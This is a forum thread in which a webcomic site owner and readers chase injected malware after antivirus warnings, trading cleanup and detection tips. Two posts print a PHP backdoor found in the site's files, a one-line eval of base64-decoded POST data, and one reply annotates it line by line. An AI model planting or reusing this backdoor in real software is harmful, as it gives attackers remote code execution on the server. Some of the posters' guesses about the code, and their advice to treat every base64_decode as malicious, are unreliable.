Ongoing fight against hackers Options

[Mata]

In the last couple of hours I've taken more steps to strengthen this site against hackers, but there will always be vulnerabilities that are harder to catch - basically, legions of hackers in poor countries can make money by finding new holes in code, therefore they always will.

If you get a virus/trojan/etc. warning from this or any of my sites please let me know immediately. Give me as many details as possible, either copy and paste text or with a screenshot of the details of the warning.

I will always try my best to keep this place secure, but there's only so much that can be done by myself and the team here. If you're not running any anti-malware, anti-virus, or a firewall then I highly recommend getting at the very least the Windows security software (which is a lot better than it used to be):

http://www.microsoft.com/en-us/security_es...ls/default.aspx

And get your browser vulnerabilities patched with Spybot:

http://www.safer-networking.org/en/index.html

Thanks for your help and patience. If anything comes up then please let me know ASAP!

[Moosh]

AVG popped these up when Firefox tried to load the RSS feed from your blog.

[Mata]

Oo, interesting one. I'll go check that out, though I've got no idea what it will look like. Thanks!

[Mata]

I've had a try at fixing that. Could you see if it's worked please?

[snooodlysnoosnoo...]

AVG is still throwing up a "Threat was blocked" warning occasionally when I come to the forum, forgot to get a shot of it though... will try and remember next time it comes up!

[Mata]

I got a script hidden in the forum code this afternoon too. It was pretty obscure so was unlikely to be triggered often. Let me know if it happens again please, but hopefully it's fixed.

[Daria]

After realising that there's no where online I'd host a screenshot of the AVG threat, I messaged it to you on fb, Mata.
It was from the search newposts page.

[Moosh]

Oo, interesting one. I'll go check that out, though I've got no idea what it will look like. Thanks!

Yeah, I think that's got it. At least AVG's not objecting anymore.

[Mata]

Daria is still seeing it, it seems.

Can anyone get a consistent reproduction of this problem?

Daria, can you get the error if you refresh your cached files? (I'm hoping that the script I found yesterday might have been the problem and it was lurking in your cache... But I think that's wishful thinking.)

[Moosh]

Speak of the devil, different day, different computer and I get:

[Mata]

Righty ho, I've finally managed to locate on nasty piece of code hiding in a cache file for the languages. The file was /forums/cache/lang_cache/en/lang_global.php

I'm assuming that this file is only accessed irregularly, so that would explain why Exploit Script Injection (type 1702) was only popping up occasionally.

The simplest method I've found for locating these problems is running a text search through all of the code on my site looking for the line 'base64_decode'. Almost every hack seems to use this to evade basic detection, but I've not seen a benevolent use of it yet, so it's definitely an indicator of shenanigans.

Another tricky one I've found hidden on a couple of files was this:

if (isset($_GET["cookie"])) { echo 'cookie=4'; if (isset($_POST["a9707a3e38"])) @eval(base64_decode($_POST["a9707a3e38"])); exit; }

I think what this was trying to do was email off cookies, probably to steal passwords, but I'm not quite sure how it works and it wasn't in a location that anyone else on here has access to, so it's nothing to be worried about.

So... Let me know if you see anything untoward happening again! I sincerely hope I've got all of this crap this time - it's taken many, many hours! (Of course, I'd rather know if there's still something I've missed!)

[CrazyFooIAintGet...]

Righty ho, I've finally managed to locate on nasty piece of code hiding in a cache file for the languages. The file was /forums/cache/lang_cache/en/lang_global.php

I'm assuming that this file is only accessed irregularly, so that would explain why Exploit Script Injection (type 1702) was only popping up occasionally.

The simplest method I've found for locating these problems is running a text search through all of the code on my site looking for the line 'base64_decode'. Almost every hack seems to use this to evade basic detection, but I've not seen a benevolent use of it yet, so it's definitely an indicator of shenanigans.

Another tricky one I've found hidden on a couple of files was this:

if (isset($_GET["cookie"])) { echo 'cookie=4'; if (isset($_POST["a9707a3e38"])) @eval(base64_decode($_POST["a9707a3e38"])); exit; }

I think what this was trying to do was email off cookies, probably to steal passwords, but I'm not quite sure how it works and it wasn't in a location that anyone else on here has access to, so it's nothing to be worried about.

So... Let me know if you see anything untoward happening again! I sincerely hope I've got all of this crap this time - it's taken many, many hours! (Of course, I'd rather know if there's still something I've missed!)

Hmm... my guess would be its to hijack your admin session.

CODE

if (isset($_GET["cookie"])) {                        // check if a cookie was sent in the request (i.e. user is logged in)
    echo 'cookie=4';                                 // useless
    if (isset($_POST["a9707a3e38"]))                 // check if some POST variable was sent in the HTTP request. You'd have to be redirected here from a malicious site for this to be true
        @eval(base64_decode($_POST["a9707a3e38"]));  // execute it as PHP code
    exit;                                            // useless
}

[Mata]

We should be good in that regard - the admin sessions are very short on here.

Has anyone had any new problems since yesterday afternoon?

[Mata]

Okay, I've found this:

http://sitecheck.sucuri.net/scanner/?scan=....matazone.co.uk

Apparently it's on my comic, but I can't find it bloody anywhere.

I've run scans through my whole server for iframe commands and couldn't find this one. I couldn't find any nasty base64_decode commands either, so I don't think it's concealed in there. I've scanned all of my databases for iframe commands and I don't think it's in there either.

Help! Any suggestions to help find it appreciated.

[SPEAKERfortheLOS...]

If you have the funding, try creating another domain like test.matazone.co.uk and recreate the comic.matazone.co.uk site there.

That way, once it is setup to your liking, you can find if the scan is a remnant of the past infection or if there is an underlying issue to be resolved.

[Daria]

I got it again today, twice: once on the Mittens Zombie Game, and once on the search new posts page. Forgot to get a screenshot of either one, I'm afraid :/


On a different note, I went back through the Mr Snaffleburger cartoons today because I was showing them to a friend. I found it interesting, Mata, that they were probably a huge influence on how I thought about corporate advertising and capitalism when I was in my early teens. So, thank you!

[Mata]

I'd deleted the installation of PHPads and the associated database a couple of weeks ago after suspecting that this was the problem, but it seems that somehow the evocation code was somehow compromised. I've no idea how, because the links pointed to a folder on my site and I know for a fact that the folder doesn't exist any more...

Still, I think that this has probably fixed the issue, so you're all back on watch again please - let me know if you see any trojan warnings again please!

Daria: my work here is done It was a very deliberate choice at the time to try and make people question corporate messages (in an entertaining way). I'm very chuffed that this was effective and honoured that it may have played a tiny part in making you as awesome as you are.

[Hobbes]

Okay, I've found this:

http://sitecheck.sucuri.net/scanner/?scan=....matazone.co.uk

Apparently it's on my comic, but I can't find it bloody anywhere.

Your site has been showing up as clear for me, and I haven't had any alerts from virus or spyware software this time around. I've clicked my way through most of the forum and comic pages to see if anything has flagged up but nothing so far. Could it be browser-specific?

[Mata]

Possibly, but hopefully I've fixed it!

[Mata]

I've had one report of Kaspersky still being grumpy on my comic. Could people with AVG or Kaspersky clear their cached internet files and refresh the page on my comic please?

I'm really hoping I've got it fixed, but I need to know if it's not. I have never had any warnings with Firefox, Windows Security Essentials, and Spybot blocking script exploits, so I can't see these problems myself. Confirmation one way or another would be appreciated!

[Pixelgoth]

Got a blocked threat message but don't know how to paste it here

[Mata]

Last night (about midnight UK time) I got desperate and overwrote the entire main layout template for my comic and I hope that's solved the problem there, although I would have much rather found the problem so I could identify it more easily in the future.

Pixie: did you get a warning while on my comic or on these forums? If it's on here then that's going to be a lot harder to fix, and I'm going to have to rest in the hands of Mr Fuzzy on that one. If there's anything nasty lurking on the forums (you know, other than SPS*) then I've got no idea how to find it past what I've already tried.

You can use the 'Prt Sc' button to take a screenshot of whatever is on your screen at the time. You can then paste it into MS Paint (or Photoshop preferably) and save the file. You can then attach the file to a message on Facebook.

*(We love you really, SPS).

[Mata]

I've had one report of a trojan still lurking on the forums. Has anyone else seen this? It's the same as before: detected with AVG and suggesting that the problem is 'Script Exploit type 1702'. Once again, I can't find anything untoward in the code.

[Moosh]

Yeah, I've started getting the same messages as above. Only sporadically though, not every time I come on matazone.co.uk, but they can be set off by the forums, the comic, the blog...

[Mata]

Rargh!

Okay, please take a screen shot with the 'more details' tab revealed, and note the URL and time please. I've got no idea where to start.

I don't know enough about this to say what it could be, but is it possible that there is something on the server itself, not actually on my pages, that is randomly blipping a trojan warning out to any .php page?